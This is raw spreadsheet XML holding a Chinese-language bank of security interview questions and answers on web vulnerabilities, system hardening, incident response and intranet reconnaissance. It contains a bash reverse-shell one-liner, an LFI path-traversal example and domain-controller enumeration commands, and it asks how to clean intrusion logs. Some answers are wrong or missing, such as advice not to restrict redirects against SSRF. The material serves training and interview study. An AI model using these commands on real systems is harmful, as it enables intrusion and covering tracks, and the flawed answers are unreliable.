    <t>CSRF（全称Cross-site request forgery）即跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或包含攻击代码的页面，在受害者不知情的情况下以受害者的身份（身份认证所对应的信息）向服务器发送请求，从而完成非法操作（如转账、改密等）。</t>
  </si>
  <si>
    <t>CSRF是什么？修复方式？</t>
  </si>
  <si>
    <t>CSRF（Cross-site request forgery）跨站请求伪造：攻击者诱导受害者进入第三方网站，在第三方网站中，向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证，绕过后台的用户验证，达到冒充用户对被攻击的网站执行某项操作的目的。
修复方式：（因为CSRF通常从第三方网站发起，被攻击的网站无法防止攻击发生，只能通过增强自己网站针对CSRF的防护能力来提升安全性）
详情见网址：https://tech.meituan.com/2018/10/11/fe-security-csrf.html
或   https://blog.csdn.net/hitwangpeng/article/details/45532959</t>
  </si>
  <si>
    <t>SSRF漏洞原理、利用方式及修复方案？Java和PHP的SSRF区别？</t>
  </si>
  <si>
    <t xml:space="preserve">
原理：由攻击者构造的攻击链接传给服务端执行造成的漏洞，一般用来在外网探测或攻击内网服务。
SSRF漏洞一般位于远程图片加载与下载、图片或文章收藏功能、URL分享、通过URL在线翻译、转码等功能点处。
利用：
1）CURL支持协议
2）利用file协议读取文件
3）利用dict协议查看端口开放
4）利用gopher协议反弹shell
防御：
1）限制协议为HTTP、HTTPS
2）不用限制302重定向
3）设置URL白名单或者限制内网IP等
JAVA和PHP的SSRF区别：可能是漏洞函数不同  这里不是很确定
https://www.cnblogs.com/coderge/p/13703065.html</t>
  </si>
  <si>
    <t>XML注入</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/backlion/p/9302528.html
https://www.cnblogs.com/lcamry/p/5736998.html</t>
  </si>
  <si>
    <t>XXE是什么？修复方案是？</t>
  </si>
  <si>
    <t>XXE定义:
XXE，"xml external entity injection"，即"xml外部实体注入漏洞"
攻击者通过向服务器注入指定的xml实体内容，从而让服务器按照指定的配置进行执行，导致问题。
XXE原理：
服务端接收和解析了来自用户端的xml数据，而又没有做严格的安全控制，从而导致xml外部实体注入，造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害
修复方案： https://my.oschina.net/u/574353/blog/1841103</t>
  </si>
  <si>
    <t>说出至少三种业务逻辑漏洞，以及修复方式？</t>
  </si>
  <si>
    <t>密码找回漏洞，存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码 
身份认证漏洞，最常见的是会话固定攻击和 Cookie 仿冒，只要得到 Session 或 Cookie 即可伪造用户身份 
验证码漏洞，中存在验证码允许暴力破解、验证码可以通过 Javascript 或者改包的方法来进行绕过</t>
  </si>
  <si>
    <t>越权访问(水平/垂直/未授权)</t>
  </si>
  <si>
    <t>越权访问：https://www.cnblogs.com/dummersoul/p/13475010.html
未授权：  https://misakikata.github.io/2019/06/%E8%B6%8A%E6%9D%83-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/</t>
  </si>
  <si>
    <t>谈谈水平/垂直/未授权越权访问的区别?</t>
  </si>
  <si>
    <t>水平越权:指相同权限下不同的用户可以互相访问
垂直越权:指使用权限低的用户可以访问到权限较高的用户
https://www.cnblogs.com/dummersoul/p/13475010.html</t>
  </si>
  <si>
    <t>越权问题如何自动化检测？</t>
  </si>
  <si>
    <t>https://www.secrss.com/articles/13426</t>
  </si>
  <si>
    <t>java的MVC结构都是做什么的，数据流向数据库的顺序是什么？</t>
  </si>
  <si>
    <t>MCV详情介绍：https://developer.aliyun.com/article/66658</t>
  </si>
  <si>
    <t>了解java沙箱吗？</t>
  </si>
  <si>
    <t>Java安全模型的核心就是Java沙箱（sandbox），什么是沙箱？沙箱是一个限制程序运行的环境。沙箱机制就是将 Java 代码限定在虚拟机(JVM)特定的运行范围中，并且严格限制代码对本地系统资源访问，通过这样的措施来保证对代码的有效隔离，防止对本地系统造成破坏。沙箱主要限制系统资源访问，那系统资源包括什么？——CPU、内存、文件系统、网络。不同级别的沙箱对这些资源访问的限制也可以不一样。
https://www.cnblogs.com/MyStringIsNotNull/p/8268351.html</t>
  </si>
  <si>
    <t>ibats的参数化查询能不能有效的控制sql注入？有没有危险的方法可以造成sql注入？</t>
  </si>
  <si>
    <t xml:space="preserve">参数化查询主要：
1：参数过滤，
2：执行计划重用
因为参数化查询可以重用执行计划，并且如果重用执行计划的话，SQL所要表达的语义就不会变化，所以就可以防止SQL注入
https://blog.csdn.net/lishehe/article/details/8753313
</t>
  </si>
  <si>
    <t>说说两次struts2漏洞的原理</t>
  </si>
  <si>
    <t>https://yaofeifly.github.io/2017/09/08/Struts2-052/
https://blog.csdn.net/zhangzeyuaaa/article/details/53676073</t>
  </si>
  <si>
    <t>ongl在这个payload中起了什么作用？</t>
  </si>
  <si>
    <t>\u0023是什么字符的16进制编码？为什么在payload中要用他？</t>
  </si>
  <si>
    <t>Unicode #号的编码
在url中直接输入#会出现错误</t>
  </si>
  <si>
    <t>java会不会发生执行系统命令的漏洞？java都有哪些语句，方法可以执行系统命令？</t>
  </si>
  <si>
    <t>会
1. Java本地命令执行测试
2. 深层调用命令执行测试
3. 本地命令执行防御
3.1 RASP防御Java本地命令执行
详解：https://blog.csdn.net/weixin_39997829/article/details/110089959</t>
  </si>
  <si>
    <t>如果叫你修复一个xss漏洞，你会在java程序的那个层里面进行修复？</t>
  </si>
  <si>
    <t>xss filter在java程序的哪里设置？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/feng_an_qi/article/details/45666813</t>
  </si>
  <si>
    <t>说下java的类反射在安全上可能存在哪些问题</t>
  </si>
  <si>
    <t>http://www.mchz.com.cn/cn/service/safety-lab/info_26_itemid_2942.html
https://www.infoq.cn/article/2016/05/java-reflection-vulnerability</t>
  </si>
  <si>
    <t>Java反序列化漏洞的原理?解决方案?</t>
  </si>
  <si>
    <t>https://blog.csdn.net/m0_38103658/article/details/100581450l</t>
  </si>
  <si>
    <t>你都了解哪些java框架？</t>
  </si>
  <si>
    <t>2020知乎最棒9个java框架
https://zhuanlan.zhihu.com/p/99770142</t>
  </si>
  <si>
    <t>php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？</t>
  </si>
  <si>
    <t>服务器解析执行php文件时通过包含函数（include、require、include_once、require_once）可以加载另一个文件中的php代码
www.xxx.com/index.php?language=/etc/passwd
查看特征：在某一个页面中，一个变量的值等于一个页面文件或者是一个固定的值，如?page=a.asp  ?home=b.html  ?file=content
通过…/ , /从目录中直接读取文件的内容</t>
  </si>
  <si>
    <t>php反序列化漏洞的原理?解决方案?</t>
  </si>
  <si>
    <t>未对用户输入的序列化字符串进行检测，导致攻击者可以控制反序列化过程，从而导致代码执行，SQL注入，目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。
使用安全的基础库</t>
  </si>
  <si>
    <t>php webshell检测，有哪些方法</t>
  </si>
  <si>
    <t>静态检测通过匹配特征码，特征值，危险函数函数来查找webshell
webshell起来如果执行系统命令的话，会有进程,即动态特征
会在网站的web日志中留下Webshell页面的访问数据和数据提交记录
语法语义分析形式，是根据php语言扫描编译的实现方式，进行剥离代码、注释，分析变量、函数、字符串、语言结构的分析方式，来实现关键危险函数的捕捉方式
webshell由于往往经过了编码和加密，会表现出一些特别的统计特征
变形webshell可以由统计学NeoPI工具检测，也可以动态检测</t>
  </si>
  <si>
    <t>php的%00截断的原理是什么？</t>
  </si>
  <si>
    <t>PHP 内核是 C 实现的，使用了 C 中的字符处理函数，在连接字符串时，0 字节也就是 x00 会作为结束符，所以只要加入一个 0 字节，就可以截断字符串，0 经过 URL 编码后为 %00</t>
  </si>
  <si>
    <t>php.ini可以设置哪些安全特性</t>
  </si>
  <si>
    <t>disable_functions（禁用） = phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,proc_get_status
display_errors=off（关闭错误显示）   Exposure_php=off（关闭显示版本号）</t>
  </si>
  <si>
    <t>php里面有哪些方法可以不让错误回显？</t>
  </si>
  <si>
    <t>display_errors=off
error_reporting=0
使用error_reporting函数int error_reporting ([ int $level ] )error_reporting(0);//关闭所有错误报告
使用ini_set函数配置此方法同方法1、2，只是在代码里面写，在无法修改php.ini的时候使用string ini_set ( string $varname , string $newvalue )ini_set('display_errors', '0');ini_set('error_reporting','0');
使用@屏蔽单条语句的错误回显在需要屏蔽错误回显的语句前添加@符号</t>
  </si>
  <si>
    <t>Redis未授权访问漏洞如何入侵利用？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/u012991692/article/details/82937060</t>
  </si>
  <si>
    <t>JAVA有哪些比较常见的中间件容器？</t>
  </si>
  <si>
    <t>tomcat
Weblogic
JBOSS
Coldfusion
Websphere
GlassFish</t>
  </si>
  <si>
    <t>tomcat要做哪些安全加固？</t>
  </si>
  <si>
    <t>升级到最新稳定版
从监听端口上加固
自定义错误页面，隐藏Tomcat信息
禁用Tomcat管理页面
用普通用户启动Tomcat
禁止Tomcat列目录
https://blog.51cto.com/netexr/1259882</t>
  </si>
  <si>
    <t>如果tomcat重启的话，webapps下，你删除的后台会不会又回来？</t>
  </si>
  <si>
    <t>不会</t>
  </si>
  <si>
    <t>常见的网站服务器中间件容器。</t>
  </si>
  <si>
    <t>WebLogic
WebSphere
JBoss
Tomcat</t>
  </si>
  <si>
    <t>mysql表权限里面，除了增删改查，文件读写，还有哪些权限？</t>
  </si>
  <si>
    <t>mysql安全要如何做？</t>
  </si>
  <si>
    <t>严格限定参数类型；
只要是由固定格式类型的变量，在SQL语句执行前，应该严格按照固定格式检查（数据太大的情况下不适合）
明确参数检验的边界，必须在服务端执行数据验证；
采用参数化查询的方法（推荐）
参数化查询强制开发者先定义所有的SQL语句，然后向每个查询传递参数。使用参数化查询可以使数据库区分代码和数据的区别，用户输入会被当做数据处理，而不是当成代码被执行。
内置过滤系统（本质是黑名单，很常见但不推荐）经常采用addslashes函数，他会在指定的预定义字符前添加反斜杠转义，预定义字符；单引号（‘）双引号（“）反斜杠0 NULL；
链接数据库的应用账号权限最小化原则。</t>
  </si>
  <si>
    <t>sqlserver public权限要如何提权</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_30699465/article/details/99789470</t>
  </si>
  <si>
    <t>linux上六种常用的安全加固技术：
1 安全的编码(Secure Code)，减少编写的错误。
2 应用层漏洞缓解技术（Application-level exploitation）（SSP,relro）
3 系统级漏洞缓解技术（System-level exploit mitigation）(ASLR,NX),
4 降权处理（Privilege Dropping）（Sandboxing）
5 强制访问控制（Mandatory access control）（MAC，SELinux）
6 更新策略(Update strategy)
https://blog.csdn.net/softgmx/article/details/82260175   linux
删除无用账户、增强口令策略、关闭不需要的服务、关闭netbios服务（关闭139端口）、关闭网络文件和打印共享、关闭IPV6、关闭microsoft网络客户端（关闭445端口）、关闭LLMNR（关闭5355端口）、增加网络访问限制、修改3389远程访问默认端口、给Everyone降权、增加日志审计、关闭ICMP
https://jingyan.baidu.com/article/2a138328f68dad074a134f13.html  windows
数据库
1.安装补丁
2.修改密码
3.使用SSL网络加密
4.修改端口
5.降权
6.系统加固</t>
  </si>
  <si>
    <t>user表里
password()函数，使用MySQLSHA1（安全Hash算法）进行加密；old_password()函数，方法和password()函数加密的方式一样；
使用encode和decode的加密，但是前提是mysql字段类型要是blob的；MD5函数进行加密</t>
  </si>
  <si>
    <t>mysql数据库默认有哪些库？说出库的名字</t>
  </si>
  <si>
    <t>information_schema
performance_schema
mysql
test</t>
  </si>
  <si>
    <t>mysql UDF提权5.1以上版本和5.1以下有什么区别,以及需要哪些条件?</t>
  </si>
  <si>
    <t>简述Linux系统安全加固需要做哪些方面？</t>
  </si>
  <si>
    <t>linux上六种常用的安全加固技术：
1 安全的编码(Secure Code)，减少编写的错误。
2 应用层漏洞缓解技术（Application-level exploitation）（SSP,relro）
3 系统级漏洞缓解技术（System-level exploit mitigation）(ASLR,NX),
4 降权处理（Privilege Dropping）（Sandboxing）
5 强制访问控制（Mandatory access control）（MAC，SELinux）
6 更新策略(Update strategy)
https://blog.csdn.net/softgmx/article/details/82260175   linux</t>
  </si>
  <si>
    <t>你使用什么工具来判断系统是否存在后门？</t>
  </si>
  <si>
    <t>任意抓包工具，抓取包后进行解包</t>
  </si>
  <si>
    <t>Linux的Selinux是什么？如何设置Selinux？</t>
  </si>
  <si>
    <t>安全子系统
getenforce：查看selinux运行状态
setenforce 0 ：关闭selinux
setenforce 1 ：开启selinux
https://www.cnblogs.com/zhynet/p/11130627.html</t>
  </si>
  <si>
    <t>iptables工作在TCPIP模型中的哪层？</t>
  </si>
  <si>
    <t>网络层</t>
  </si>
  <si>
    <t>如果无法升级内核，那么如何保证系统不被已知的exp提权？</t>
  </si>
  <si>
    <t>syslog里面都有哪些日志？安装软件的日志去哪找？</t>
  </si>
  <si>
    <t>1)可在/etc/rsyslog.conf中查看具体位置及类型，如：/var/log/messages 记录Linux操作系统常见的系统和服务错误信息 
2)如：是使用yum进行安装的，则可在/var/log/yum.log中看到安装日志</t>
  </si>
  <si>
    <t>如何查询ssh的登录日志？如何配置syslog的日志格式？</t>
  </si>
  <si>
    <t>1）/var/log/lastlog 查看上一次登陆成功 /var/log/btmp 查看登陆失败 2)</t>
  </si>
  <si>
    <t>syslog可不可以使用vi等工具直接查看？是二进制文件吗？</t>
  </si>
  <si>
    <t>1）部分不可以，如：btmp，lastlog，wtmp，utmp。分别用lastb，lastlog，last，（w，who，users）查看 2）btmp，lastlog，wtmp为二进制文件</t>
  </si>
  <si>
    <t>如果一台Linux服务器被入侵后,你会如何做应急响应?</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/anbuxuan/p/11837007.html</t>
  </si>
  <si>
    <t>1）bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1  2）bash shell  3）linux的默认shell</t>
  </si>
  <si>
    <t>有哪几种后门实现方式？</t>
  </si>
  <si>
    <t>windows：https://blog.csdn.net/weixin_42109012/article/details/99680972  linux：https://www.jianshu.com/p/90812924f83e</t>
  </si>
  <si>
    <t>webshell检测有什么方法思路？</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/he1m4n6a/p/9245155.html</t>
  </si>
  <si>
    <t>Linux服务器中了木马后，请简述应急思路？</t>
  </si>
  <si>
    <t>遇到新0day(比如Struts2)后，应该如何进行应急响应？</t>
  </si>
  <si>
    <t>确认漏洞、风险评估、修复漏洞</t>
  </si>
  <si>
    <t>新业务上线前可以从哪些方向进行安全评估？</t>
  </si>
  <si>
    <t>现有系统可以从哪些方向进行审计发现其中的安全风险？</t>
  </si>
  <si>
    <t>便于查找已知的可用漏洞或下载源码进行代码审计</t>
  </si>
  <si>
    <t>如何清理入侵日志</t>
  </si>
  <si>
    <t>http://linux.ctocio.com.cn/linux/2020/0914/37333.html</t>
  </si>
  <si>
    <t>总结渗透报告及修复方案</t>
  </si>
  <si>
    <t>通过社工邮箱反查注册人的更多信息便于渗透</t>
  </si>
  <si>
    <t>如果给你一个网站,你的渗透测试思路是什么? 在获取书面授权的前提下</t>
  </si>
  <si>
    <t>DNS在渗透中的作用？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_44023680/article/details/111702074?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.control</t>
  </si>
  <si>
    <t>怎么查找域控</t>
  </si>
  <si>
    <t xml:space="preserve">方法很多
1.通过DNS查询 
dig -t SRV _gc._tcp.lab.ropnop.com  
dig -t SRV _ldap._tcp.lab.ropnop.com  
dig -t SRV _kerberos._tcp.lab.ropnop.com  
dig -t SRV _kpasswd._tcp.lab.ropnop.com 
2.端口扫描 
域服务器都会开启389端口，所以可以通过扫描端口进行识别。 
3.其实很多域环境里，DNS服务器就是域控制根本不需要怎么找。 
4.各种命令 
dsquery 
net group "Domain controllers" 
nltest /DCLIST:pentest.com 
...... </t>
  </si>
  <si>
    <t>常用的代理和端口转发的工具</t>
  </si>
  <si>
    <t>https://www.freebuf.com/articles/web/170970.html</t>
  </si>
  <si>
    <t>内网的信息搜集</t>
  </si>
  <si>
    <t>https://zhuanlan.zhihu.com/p/161616450</t>
  </si>
  <si>
    <t>之前有使用过Linux么？要是现在后台有一个进程，你需要找到他的程序执行文件，该怎么找？</t>
  </si>
  <si>
    <t>已知程序名称：ps -aux | grep NAME
已知端口：netstat -anp | grep :port
已知PID：ps -aux | grep PID
然后通过/proc/PID目录中exe -&gt; xxxx 即可查找到程序的执行位置
这道题问的很细很细，应该是想着重考察一下Linux使用方面</t>
  </si>
  <si>
    <t>简述log4j,weblogic,jboss,shiro,fastjson等流量特征</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</si>
</sst>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s>
  <fonts count="41">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF0000FF"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color rgb="FF333333"/>
      <name val="Verdana"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color rgb="FFFFFFFF"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="10.5"/>
      <color rgb="FF0000FF"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="10.5"/>
      <color rgb="FF0000FF"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10.5"/>
      <color rgb="FFFFFFFF"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="10.5"/>
      <color rgb="FF0000FF"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF417FF9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF555666"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color rgb="FF5D5656"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="3"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color theme="3"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFA7D00"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color theme="3"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF0000FF"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF7F7F7F"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color theme="3"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF006100"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C6500"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF3F3F3F"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFA7D00"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF3F3F76"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C0006"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF0000FF"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF808080"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="40">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF70AD47"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00B050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0070C0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4472C4"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00B0F0"/>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theme="6"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"/>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7" tint="0.599993896298105"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.599993896298105"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFCC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA5A5A5"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.799981688894314"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.399975585192419"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.799981688894314"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>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rgb="FFFFEB9C"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F2F2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.599993896298105"/>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5"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.399975585192419"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.599993896298105"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.799981688894314"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="6" tint="0.599993896298105"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFCC99"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC7CE"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="9">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="4" tint="0.499984740745262"/>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s>
  <cellStyleXfs count="49">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyBorder="0"/>
    <xf numFmtId="0" fontId="20" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="37" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="44" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="33" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="28" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="27" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
